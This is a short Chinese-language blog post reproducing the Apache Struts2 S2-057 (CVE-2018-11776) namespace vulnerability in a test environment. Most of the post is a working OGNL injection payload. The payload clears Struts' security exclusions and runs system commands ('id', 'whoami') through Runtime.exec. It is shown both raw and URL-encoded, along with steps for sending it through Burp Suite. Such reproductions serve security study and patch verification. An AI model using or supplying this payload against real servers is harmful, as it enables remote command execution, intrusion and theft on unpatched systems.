Apache struts2 namespace远程命令执行—CVE-2018-11776(S2-057)漏洞复现

大家好，又见面了，我是你们的朋友全栈君。

S2-057漏洞产生于网站配置xml的时候，有一个namespace的值，该值并没有做详细的安全过滤导致可以写入到xml上，尤其url标签值也没有做通配符的过滤，导致可以执行远程代码以及系统命令到服务器系统中去 。

启动环境后，在Win10上访问http://IP:port/struts2-showcase

1.构建Payload：

访问：

http://your-ip:8080/struts2-showcase/$%7B233*233%7D/actionChain1.action

可以看到233 * 233的结果已在Location标头中返回。

将以下payload进行URL编码：

${ (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request[‘struts.valueStack’].context).(#cr=#ct[‘com.opensymphony.xwork2.ActionContext.container’]).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec(‘id’)).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

URL编码后

$%7B%0A%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23a.getInputStream%28%29%29%29%7D

并在burpsuit的GET /struts2-showcase/$%7B233*233%7D/actionChain1.action HTTP/1.1中将URL编码的插入到/$%7B233*233%7D/ ,将$%7B233*233%7D去掉。